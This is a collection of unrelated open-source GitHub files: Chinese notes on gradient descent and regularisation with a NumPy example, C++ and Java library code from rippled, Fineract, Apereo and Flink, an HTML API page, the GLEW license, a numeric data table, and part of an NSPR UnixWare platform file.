**注:本文里的损失函数其实是代价函数,这里没有一个公认的区别标准,别的说法里损失函数主要指的是对于单个样本的损失或误差,这里我们等同与代价函数,表示多样本误差的总和。**
### 损失函数与凸函数
在使用梯度下降进行最小化损失函数的时候,如果损失函数是凸函数,那么不管怎么初始化,总能找到全局最优解。否则,很有可能陷入局部最优解。
### 泰勒展开
泰勒展开是将一个在$x=x_0$处具有n阶导数的函数$f(x)$利用关于$(x-x0)$的n次多项式来逼近函数的方法。
设 n 是一个正整数。如果定义在一个包含 a 的区间上的函数 f 在 a 点处 n+1 次可导,那么对于这个区间上的任意 x,都有:
$f(x)=f(a)+\frac{f^{\prime}(a)}{1 !}(x-a)+\frac{f^{(2)}(a)}{2 !}(x-a)^{2}+\cdots+\frac{f^{(n)}(a)}{n !}(x-a)^{n}+R_{n}(x)$
表示$f^{(n)}(a)$ $f(x)$的n阶导数,等号后的多项式称为函数$f(x)$在$a$处的泰勒展开式,剩余的$R_n(x)$是泰勒公式的余项,是$(x-a)^n$的高阶无穷小。
### 推导梯度下降
梯度下降算法如下:
$θ_j:=θ_j−α\frac∂{∂θ_j}L(θ)$
$a$为学习率(步长)。
推导过程基于泰勒展开的一阶项:
$f(\theta)=f(\theta_0)+(\theta-\theta_0){\bigtriangledown}f(\theta_0)$
为了最小化函数,希望函数往使函数减小的方向变化,则有:
$(\theta-\theta_0){\bigtriangledown}f(\theta_0) < 0$,
其中 $(\theta-\theta_0)$ 是微小矢量,可表示为$a^{'}v$, $a^{'}$类似上面提到的学习率,为正值,取尽量小的值,$v$为该方向上的单位向量,
所有上面的不等式变成:
$v{\bigtriangledown}f(\theta_0) < 0$
然后根据两个向量乘积,我们知道两个向量方向相反可取向量乘积最小值,不难得:
$θ=θ_0−α{\bigtriangledown}f(\theta_0)$, $a$为$a^{'}$与${\bigtriangledown}f(\theta_0)$的模的乘积。
### 梯度下降代码实现
```pyth
"""
自己实现
梯度下降解决线性回归问题
"""
import numpy as np
import matplotlib.pyplot as plt
def costFunction(X, y, theta=[0, 0]):
"""
损失函数
"""
m = y.size
h = X.dot(theta)
J = 1.0 / (2 * m) * (np.sum(np.square(h - y)))
return J
def gradientDescent(X, y, theta=[0, 0], alpha=0.01, num_iters=1500):
"""
梯度下降
"""
m = y.size
J_history = np.zeros(num_iters)
for iter in np.arange(num_iters):
h = X.dot(theta)
theta = theta - alpha * (1.0 / m) * (X.T.dot(h - y))
J_history[iter] = costFunction(X, y, theta)
return (theta, J_history)
def MaxMinNormalization(x):
"""
归一化
"""
Min = np.min(x)
Max = np.max(x)
x = (x - Min) / (Max - Min)
return x
# 自己构造数据集
X_row = 100 * np.random.rand(100)
X = MaxMinNormalization(X_row)
y = 0.5*X + 2 + np.random.normal(0,0.01,(100,))
# 数据可视化
plt.subplot(1, 2, 1)
plt.scatter(X_row, y, color='black')
plt.xlabel('x')
plt.ylabel('y')
X = np.c_[np.ones((X.shape[0],1)), X]
# training set
X_train = X[:80]
y_train = y[:80]
# test set
X_test = X[80:]
y_test = y[80:]
b = 0
w = 0
lr = 0.01
iteration = 10000
# 画出每一次迭代和损失函数变化
theta , Cost_J = gradientDescent(X_train, y_train, theta=[b, w], alpha= lr, num_iters= iteration)
print('最终b, w结果: ',theta)
testCost = costFunction(X_test, y_test, theta)
print('测试集误差: ',testCost)
h = X.dot(theta)
plt.plot(X_row, h, "b--")
plt.subplot(1, 2, 2)
plt.plot(Cost_J)
plt.ylabel('Cost J')
plt.xlabel('Iterations')
plt.show()
```
结果如下:
```
最终b, w结果: [1.99788294 0.50547522]
测试集误差: 5.113037555609278e-05
```

### 学习L2-Norm,L1-Norm,L0-Norm
>范数是一种强化了的距离概念,它在定义上比距离多了一条数乘的运算法则。有时候为了便于理解,我们可以把范数当作距离来理解。
>
>L0范数是指向量中非0的元素的个数。
>
>L1范数是指向量中非零元素绝对值之和。
>
>L2范数是指向量各元素的平方和然后求平方根,L2范数通常会被用来做优化目标函数的正则化项,防止模型为了迎合训练集而过于复杂造成过拟合的情况,从而提高模型的泛化能力。
### 推导正则化公式
参考[L2正则化推导](<https://blog.csdn.net/winone361/article/details/82555283>)
### 为什么用L1-Norm代替L0-Norm
L0-Norm 优化的目标是使大多数参数为0,即W是稀疏的。但L0范数的优化问题是NP hard,且可证L1范数是L0范数的最优凸近似,因此通常使用L1范数来代替。
### 为什么正则化时只对w/Θ做限制,不对b做限制
模型的复杂程度是由w/θ决定的,b只是起到平移模型的作用。缩小b不能使模型简化,只能使模型分界面趋于靠近原点。相反,对w的限制可以实现对特征的惩罚,留取更重要的特征,惩罚不重要的特征权重,从而使Loss Function更平滑,提高泛化能力,防止过拟合。
------
参考:
[从最大似然估计开始,你需要打下的机器学习基石](<https://blog.csdn.net/tkkzc3E6s4Ou4/article/details/79016194>)
[L2正则化推导](<https://blog.csdn.net/winone361/article/details/82555283>) | {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
/*
This file is part of rippled: https://github.com/ripple/rippled
Copyright (c) 2012, 2013 Ripple Labs Inc.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL , DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
//==============================================================================
#ifndef RIPPLE_VALIDATORS_COUNT_H_INCLUDED
#define RIPPLE_VALIDATORS_COUNT_H_INCLUDED
namespace ripple {
namespace Validators {
/** Measures Validator performance statistics. */
struct Count
{
Count()
: received (0)
, expected (0)
, closed (0)
{
}
Count (std::size_t received_,
std::size_t expected_,
std::size_t closed_)
: received (received_)
, expected (expected_)
, closed (closed_)
{
}
/** Reset the statistics. */
void clear ()
{
*this = Count();
}
/** Returns the percentage of ledger participation. */
int percent () const
{
int const total (closed + expected);
if (total > 0)
return (closed * 100) / total;
return 0;
}
/** Returns the percentage of orphaned validations. */
int percent_orphaned () const
{
int const total (received + closed);
if (total > 0)
return (received * 100) / total;
return 0;
}
/** Output to PropertyStream. */
void onWrite (beast::PropertyStream::Map& map)
{
map["received"] = received;
map["expected"] = expected;
map["closed"] = closed;
map["percent"] = percent ();
map["percent_orphan"] = percent_orphaned();
}
std::size_t received; // Count of validations without a closed ledger
std::size_t expected; // Count of closed ledgers without a validation
std::size_t closed; // Number of validations with closed ledgers
};
inline Count operator+ (Count const& lhs, Count const& rhs)
{
return Count (
lhs.received + rhs.received,
lhs.expected + rhs.expected,
lhs.closed + rhs.closed);
}
}
}
#endif
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!-- This comment will force IE7 to go into quirks mode. -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></meta>
<link rel="stylesheet" type="text/css" href="../../CSS/Contents.css"></link>
<script type="text/javascript" src="../../JS/Common.js"></script>
<title>Contract.RequiresException Constructor (string)</title>
</head>
<body>
<div id="Header">
<div id="ProjectTitle">Documentation Project</div>
<div id="PageTitle">Contract.RequiresException Constructor (string)</div>
<div id="HeaderShortcuts">
<a href="#SectionHeader0" onclick="javascript: SetSectionVisibility(0, true); SetExpandCollapseAllToCollapseAll();">Syntax</a>
</div>
<div class="DarkLine"></div>
<div class="LightLine"></div>
<div id="HeaderToolbar">
<img id="ExpandCollapseAllImg" src="../../GFX/SmallSquareExpanded.gif" alt="" style="vertical-align: top;" onclick="javascript: ToggleAllSectionsVisibility();" />
<span id="ExpandCollapseAllSpan" onclick="javascript: ToggleAllSectionsVisibility();">Collapse All</span>
</div>
</div>
<div id="Contents">
<a id="ContentsAnchor"> </a>
Construct an instance with the given message.
<div id="ItemLocation">
<b>Declaring type:</b> <a href="../../Contents/1/44.html">Contract.RequiresException</a><br />
<b>Namespace:</b> <a href="../../Contents/1/38.html">System.Diagnostics.Contracts</a><br />
<b>Assembly:</b> <a href="../../Contents/1/3.html">Sasa.Contracts</a>
</div>
<div id="SectionHeader0" class="SectionHeader">
<img id="SectionExpanderImg0" src="../../GFX/BigSquareExpanded.gif" alt="Collapse/Expand" onclick="javascript: ToggleSectionVisibility(0);" />
<span class="SectionHeader">
<span class="ArrowCursor" onclick="javascript: ToggleSectionVisibility(0);">
Syntax
</span>
</span>
</div>
<div id="SectionContainerDiv0" class="SectionContainer">
<table class="CodeTable"><col width="100%" /><tr class="CodeTable"><th class="CodeTable">C#</th></tr><tr class="CodeTable"><td class="CodeTable"><pre style="margin-left: 2px;">public RequiresException (
string <i>msg</i>
) </pre></td></tr></table>
<div class="CommentHeader">Parameters</div>
<div class="CommentParameterName">msg</div>
<div class="ParameterCommentContainer">
The error message.
</div>
<div class="TopLink"><a href="#ContentsAnchor">Top</a></div></div>
</div>
<div id="Footer">
<span class="Footer">Generated by <a href="http://immdocnet.codeplex.com/" target="_blank">ImmDoc .NET</a></span>.
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
The OpenGL Extension Wrangler Library
Copyright (C) 2002-2008, Milan Ikits <milan ikits[]ieee org>
Copyright (C) 2002-2008, Marcelo E. Magallon <mmagallo[]debian org>
Copyright (C) 2002, Lev Povalahev
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* The name of the author may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.fineract.accounting.provisioning.api;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.UriInfo;
import org.apache.fineract.accounting.provisioning.constant.ProvisioningEntriesApiConstants;
import org.apache.fineract.accounting.provisioning.data.LoanProductProvisioningEntryData;
import org.apache.fineract.accounting.provisioning.data.ProvisioningEntryData;
import org.apache.fineract.accounting.provisioning.service.ProvisioningEntriesReadPlatformService;
import org.apache.fineract.commands.domain.CommandWrapper;
import org.apache.fineract.commands.service.CommandWrapperBuilder;
import org.apache.fineract.commands.service.PortfolioCommandSourceWritePlatformService;
import org.apache.fineract.infrastructure.core.api.ApiRequestParameterHelper;
import org.apache.fineract.infrastructure.core.data.CommandProcessingResult;
import org.apache.fineract.infrastructure.core.exception.UnrecognizedQueryParamException;
import org.apache.fineract.infrastructure.core.serialization.ApiRequestJsonSerializationSettings;
import org.apache.fineract.infrastructure.core.serialization.DefaultToApiJsonSerializer;
import org.apache.fineract.infrastructure.core.service.Page;
import org.apache.fineract.infrastructure.core.service.SearchParameters;
import org.apache.fineract.infrastructure.security.service.PlatformSecurityContext;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Scope;
import org.springframework.stereotype.Component;
@Path("/provisioningentries")
@Component
@Scope("singleton")
public class ProvisioningEntriesApiResource {
private final PlatformSecurityContext platformSecurityContext;
private final PortfolioCommandSourceWritePlatformService commandsSourceWritePlatformService;
private final DefaultToApiJsonSerializer<ProvisioningEntryData> toApiJsonSerializer;
private final DefaultToApiJsonSerializer<Object> entriesApiJsonSerializer;
private final ProvisioningEntriesReadPlatformService provisioningEntriesReadPlatformService;
private final ApiRequestParameterHelper apiRequestParameterHelper;
@Autowired
public ProvisioningEntriesApiResource(final PlatformSecurityContext platformSecurityContext,
final PortfolioCommandSourceWritePlatformService commandsSourceWritePlatformService,
final DefaultToApiJsonSerializer<ProvisioningEntryData> toApiJsonSerializer,
final ProvisioningEntriesReadPlatformService provisioningEntriesReadPlatformService,
final ApiRequestParameterHelper apiRequestParameterHelper, final DefaultToApiJsonSerializer<Object> entriesApiJsonSerializer) {
this.platformSecurityContext = platformSecurityContext;
this.commandsSourceWritePlatformService = commandsSourceWritePlatformService;
this.toApiJsonSerializer = toApiJsonSerializer;
this.provisioningEntriesReadPlatformService = provisioningEntriesReadPlatformService;
this.apiRequestParameterHelper = apiRequestParameterHelper;
this.entriesApiJsonSerializer = entriesApiJsonSerializer;
}
@POST
@Consumes({ MediaType.APPLICATION_JSON })
@Produces({ MediaType.APPLICATION_JSON })
public String createProvisioningEntries(final String apiRequestBodyAsJson) {
CommandWrapper commandWrapper = null;
this.platformSecurityContext.authenticatedUser();
commandWrapper = new CommandWrapperBuilder().createProvisioningEntries().withJson(apiRequestBodyAsJson).build();
final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService.logCommandSource(commandWrapper);
return this.toApiJsonSerializer.serialize(commandProcessingResult);
}
@POST
@Path("{entryId}")
@Consumes({ MediaType.APPLICATION_JSON })
@Produces({ MediaType.APPLICATION_JSON })
public String modifyProvisioningEntry(@PathParam("entryId") final Long entryId, @QueryParam("command") final String commandParam,
final String apiRequestBodyAsJson) {
CommandWrapper commandWrapper = null;
this.platformSecurityContext.authenticatedUser();
if ("createjournalentry".equals(commandParam)) {
commandWrapper = new CommandWrapperBuilder().createProvisioningJournalEntries(entryId).withJson(apiRequestBodyAsJson).build();
final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService
.logCommandSource(commandWrapper);
return this.toApiJsonSerializer.serialize(commandProcessingResult);
} else if ("recreateprovisioningentry".equals(commandParam)) {
commandWrapper = new CommandWrapperBuilder().reCreateProvisioningEntries(entryId).withJson(apiRequestBodyAsJson).build();
final CommandProcessingResult commandProcessingResult = this.commandsSourceWritePlatformService
.logCommandSource(commandWrapper);
return this.toApiJsonSerializer.serialize(commandProcessingResult);
}
throw new UnrecognizedQueryParamException("command", commandParam);
}
@GET
@Path("{entryId}")
@Consumes({ MediaType.APPLICATION_JSON })
@Produces({ MediaType.APPLICATION_JSON })
public String retrieveProvisioningEntry(@PathParam("entryId") final Long entryId, @Context final UriInfo uriInfo) {
platformSecurityContext.authenticatedUser();
ProvisioningEntryData data = this.provisioningEntriesReadPlatformService.retrieveProvisioningEntryData(entryId);
final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
return this.toApiJsonSerializer.serialize(settings, data, ProvisioningEntriesApiConstants.PROVISIONING_ENTRY_PARAMETERS);
}
@GET
@Path("entries")
@Consumes({ MediaType.APPLICATION_JSON })
@Produces({ MediaType.APPLICATION_JSON })
public String retrieveProviioningEntries(@QueryParam("entryId") final Long entryId, @QueryParam("offset") final Integer offset,
@QueryParam("limit") final Integer limit, @QueryParam("officeId") final Long officeId,
@QueryParam("productId") final Long productId, @QueryParam("categoryId") final Long categoryId, @Context final UriInfo uriInfo) {
this.platformSecurityContext.authenticatedUser();
SearchParameters params = SearchParameters.forProvisioningEntries(entryId, officeId, productId, categoryId, offset, limit);
Page<LoanProductProvisioningEntryData> entries = this.provisioningEntriesReadPlatformService.retrieveProvisioningEntries(params);
final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
return this.entriesApiJsonSerializer.serialize(settings, entries, ProvisioningEntriesApiConstants.PROVISIONING_ENTRY_PARAMETERS);
}
@GET
@Consumes({ MediaType.APPLICATION_JSON })
@Produces({ MediaType.APPLICATION_JSON })
public String retrieveAllProvisioningEntries(@QueryParam("offset") final Integer offset, @QueryParam("limit") final Integer limit,
@Context final UriInfo uriInfo) {
platformSecurityContext.authenticatedUser();
Page<ProvisioningEntryData> data = this.provisioningEntriesReadPlatformService.retrieveAllProvisioningEntries(offset, limit);
final ApiRequestJsonSerializationSettings settings = this.apiRequestParameterHelper.process(uriInfo.getQueryParameters());
return this.entriesApiJsonSerializer.serialize(settings, data, ProvisioningEntriesApiConstants.ALL_PROVISIONING_ENTRIES);
}
}
| {
"pile_set_name": "Github"
} |
/**
* Licensed to Apereo under one or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information regarding copyright ownership. Apereo
* licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use
* this file except in compliance with the License. You may obtain a copy of the License at the
* following location:
*
* <p>http://www.apache.org/licenses/LICENSE-2.0
*
* <p>Unless required by applicable law or agreed to in writing, software distributed under the
* License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apereo.portal.events.aggr;
/**
* Context of the current event aggregation run. There is a single instance of this object for each
* aggregation run. It can be used by aggregators to store data across sessions <br>
* NOTE: Attributes are globally scoped, aggregates must make sure the key is appropriate to prevent
* stepping on toes.
*/
public interface EventAggregationContext {
/** Store an attribute in the current aggregation context */
void setAttribute(Object key, Object value);
/** Get a value from the current aggregation context */
<T> T getAttribute(Object key);
}
| {
"pile_set_name": "Github"
} |
0 0 0 1 -0.328945 -0.175844
0 0 6.5 1 -0.363158 0.107856
10 0 0 1 0.0698896 -0.11075
10 0 6.5 1 0.0485066 0.138123
10 10 0 1 0.308107 -0.201914
10 10 6.5 1 0.282333 0.18789
0 10 0 1 -0.310373 -0.334345
0 10 6.5 1 -0.368596 0.148252
0 5 10 1 -0.38948 0.324362
10 5 10 1 0.125874 0.327632
0 6 0 1 -0.320227 -0.25025
0 8 0 1 -0.315902 -0.287164
0 8 5 1 -0.354846 0.0356805
0 6 5 1 -0.354936 0.0375116
0 2 2.5 1 -0.340669 -0.0792083
0 4 2.5 1 -0.339183 -0.0922361
0 4 5 1 -0.355008 0.0389753
0 2 5 1 -0.355067 0.0401721
0.5 0.5 -0.5 1 -0.302735 -0.198363
0.5 0.5 6 1 -0.336713 0.0881757
10.5 0.5 -0.5 1 0.0968582 -0.129763
10.5 0.5 6 1 0.0758307 0.121295
10.5 10.5 -0.5 1 0.354226 -0.233199
10.5 10.5 6 1 0.329596 0.16199
0.5 10.5 -0.5 1 -0.265205 -0.375999
0.5 10.5 6 1 -0.322705 0.114856
0.5 5.5 9.5 1 -0.355727 0.302286
10.5 5.5 9.5 1 0.160893 0.309142
0.5 6.5 -0.5 1 -0.285193 -0.281391
0.5 8.5 -0.5 1 -0.276441 -0.322819
0.5 8.5 4.5 1 -0.314963 0.00481314
0.5 6.5 4.5 1 -0.319572 0.0101702
0.5 2.5 2 1 -0.311948 -0.102773
0.5 4.5 2 1 -0.30755 -0.118356
0.5 4.5 4.5 1 -0.323244 0.0144371
0.5 2.5 4.5 1 -0.326237 0.0179158
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.contrib.streaming.state;
import org.apache.flink.annotation.Internal;
import org.apache.flink.annotation.VisibleForTesting;
import org.apache.flink.api.common.typeutils.TypeSerializer;
import org.apache.flink.core.memory.DataOutputSerializer;
import org.apache.flink.util.FlinkRuntimeException;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.concurrent.NotThreadSafe;
import java.io.IOException;
/**
* Responsible for serialization of currentKey, currentGroup and namespace.
* Will reuse the previous serialized currentKeyed if possible.
* @param <K> type of the key.
*/
@NotThreadSafe
@Internal
class RocksDBSerializedCompositeKeyBuilder<K> {
/** The serializer for the key. */
@Nonnull
private final TypeSerializer<K> keySerializer;
/** The output to write the key into. */
@Nonnull
private final DataOutputSerializer keyOutView;
/** The number of Key-group-prefix bytes for the key. */
@Nonnegative
private final int keyGroupPrefixBytes;
/** This flag indicates whether the key type has a variable byte size in serialization. */
private final boolean keySerializerTypeVariableSized;
/** Mark for the position after the serialized key. */
@Nonnegative
private int afterKeyMark;
public RocksDBSerializedCompositeKeyBuilder(
@Nonnull TypeSerializer<K> keySerializer,
@Nonnegative int keyGroupPrefixBytes,
@Nonnegative int initialSize) {
this(
keySerializer,
new DataOutputSerializer(initialSize),
keyGroupPrefixBytes,
RocksDBKeySerializationUtils.isSerializerTypeVariableSized(keySerializer),
0);
}
@VisibleForTesting
RocksDBSerializedCompositeKeyBuilder(
@Nonnull TypeSerializer<K> keySerializer,
@Nonnull DataOutputSerializer keyOutView,
@Nonnegative int keyGroupPrefixBytes,
boolean keySerializerTypeVariableSized,
@Nonnegative int afterKeyMark) {
this.keySerializer = keySerializer;
this.keyOutView = keyOutView;
this.keyGroupPrefixBytes = keyGroupPrefixBytes;
this.keySerializerTypeVariableSized = keySerializerTypeVariableSized;
this.afterKeyMark = afterKeyMark;
}
/**
* Sets the key and key-group as prefix. This will serialize them into the buffer and the will be used to create
* composite keys with provided namespaces.
*
* @param key the key.
* @param keyGroupId the key-group id for the key.
*/
public void setKeyAndKeyGroup(@Nonnull K key, @Nonnegative int keyGroupId) {
try {
serializeKeyGroupAndKey(key, keyGroupId);
} catch (IOException shouldNeverHappen) {
throw new FlinkRuntimeException(shouldNeverHappen);
}
}
/**
* Returns a serialized composite key, from the key and key-group provided in a previous call to
* {@link #setKeyAndKeyGroup(Object, int)} and the given namespace.
*
* @param namespace the namespace to concatenate for the serialized composite key bytes.
* @param namespaceSerializer the serializer to obtain the serialized form of the namespace.
* @param <N> the type of the namespace.
* @return the bytes for the serialized composite key of key-group, key, namespace.
*/
@Nonnull
public <N> byte[] buildCompositeKeyNamespace(@Nonnull N namespace, @Nonnull TypeSerializer<N> namespaceSerializer) {
try {
serializeNamespace(namespace, namespaceSerializer);
final byte[] result = keyOutView.getCopyOfBuffer();
resetToKey();
return result;
} catch (IOException shouldNeverHappen) {
throw new FlinkRuntimeException(shouldNeverHappen);
}
}
/**
* Returns a serialized composite key, from the key and key-group provided in a previous call to
* {@link #setKeyAndKeyGroup(Object, int)} and the given namespace, folloed by the given user-key.
*
* @param namespace the namespace to concatenate for the serialized composite key bytes.
* @param namespaceSerializer the serializer to obtain the serialized form of the namespace.
* @param userKey the user-key to concatenate for the serialized composite key, after the namespace.
* @param userKeySerializer the serializer to obtain the serialized form of the user-key.
* @param <N> the type of the namespace.
* @param <UK> the type of the user-key.
* @return the bytes for the serialized composite key of key-group, key, namespace.
*/
@Nonnull
public <N, UK> byte[] buildCompositeKeyNamesSpaceUserKey(
@Nonnull N namespace,
@Nonnull TypeSerializer<N> namespaceSerializer,
@Nonnull UK userKey,
@Nonnull TypeSerializer<UK> userKeySerializer) throws IOException {
serializeNamespace(namespace, namespaceSerializer);
userKeySerializer.serialize(userKey, keyOutView);
byte[] result = keyOutView.getCopyOfBuffer();
resetToKey();
return result;
}
private void serializeKeyGroupAndKey(K key, int keyGroupId) throws IOException {
// clear buffer and mark
resetFully();
// write key-group
RocksDBKeySerializationUtils.writeKeyGroup(
keyGroupId,
keyGroupPrefixBytes,
keyOutView);
// write key
keySerializer.serialize(key, keyOutView);
afterKeyMark = keyOutView.length();
}
private <N> void serializeNamespace(
@Nonnull N namespace,
@Nonnull TypeSerializer<N> namespaceSerializer) throws IOException {
// this should only be called when there is already a key written so that we build the composite.
assert isKeyWritten();
final boolean ambiguousCompositeKeyPossible = isAmbiguousCompositeKeyPossible(namespaceSerializer);
if (ambiguousCompositeKeyPossible) {
RocksDBKeySerializationUtils.writeVariableIntBytes(
afterKeyMark - keyGroupPrefixBytes,
keyOutView);
}
RocksDBKeySerializationUtils.writeNameSpace(
namespace,
namespaceSerializer,
keyOutView,
ambiguousCompositeKeyPossible);
}
private void resetFully() {
afterKeyMark = 0;
keyOutView.clear();
}
private void resetToKey() {
keyOutView.setPosition(afterKeyMark);
}
private boolean isKeyWritten() {
return afterKeyMark > 0;
}
@VisibleForTesting
boolean isAmbiguousCompositeKeyPossible(TypeSerializer<?> namespaceSerializer) {
return keySerializerTypeVariableSized &
RocksDBKeySerializationUtils.isSerializerTypeVariableSized(namespaceSerializer);
}
}
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C++; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is the Netscape Portable Runtime (NSPR).
*
* The Initial Developer of the Original Code is
* Netscape Communications Corporation.
* Portions created by the Initial Developer are Copyright (C) 1998-2000
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
#include "primpl.h"
#if !defined (USE_SVR4_THREADS)
/*
* using only NSPR threads here
*/
#include <setjmp.h>
void _MD_EarlyInit(void)
{
}
PRWord *_MD_HomeGCRegisters(PRThread *t, int isCurrent, int *np)
{
if (isCurrent) {
(void) setjmp(CONTEXT(t));
}
*np = sizeof(CONTEXT(t)) / sizeof(PRWord);
return (PRWord *) CONTEXT(t);
}
#ifdef ALARMS_BREAK_TCP /* I don't think they do */
PRInt32 _MD_connect(PRInt32 osfd, const PRNetAddr *addr, PRInt32 addrlen,
PRIntervalTime timeout)
{
PRInt32 rv;
_MD_BLOCK_CLOCK_INTERRUPTS();
rv = _connect(osfd,addr,addrlen);
_MD_UNBLOCK_CLOCK_INTERRUPTS();
}
PRInt32 _MD_accept(PRInt32 osfd, PRNetAddr *addr, PRInt32 addrlen,
PRIntervalTime timeout)
{
PRInt32 rv;
_MD_BLOCK_CLOCK_INTERRUPTS();
rv = _accept(osfd,addr,addrlen);
_MD_UNBLOCK_CLOCK_INTERRUPTS();
return(rv);
}
#endif
/*
* These are also implemented in pratom.c using NSPR locks. Any reason
* this might be better or worse? If you like this better, define
* _PR_HAVE_ATOMIC_OPS in include/md/unixware.h
*/
#ifdef _PR_HAVE_ATOMIC_OPS
/* Atomic operations */
#include <stdio.h>
static FILE *_uw_semf;
void
_MD_INIT_ATOMIC(void)
{
/* Sigh. Sure wish SYSV semaphores weren't such a pain to use */
if ((_uw_semf = tmpfile()) == NULL)
PR_ASSERT(0);
return;
}
void
_MD_ATOMIC_INCREMENT(PRInt32 *val)
{
flockfile(_uw_semf);
(*val)++;
unflockfile(_uw_semf);
}
void
_MD_ATOMIC_ADD(PRInt32 *ptr, PRInt32 val)
{
flockfile(_uw_semf);
(*ptr) += val;
unflockfile(_uw_semf);
}
void
_MD_ATOMIC_DECREMENT(PRInt32 *val)
{
flockfile(_uw_semf);
(*val)--;
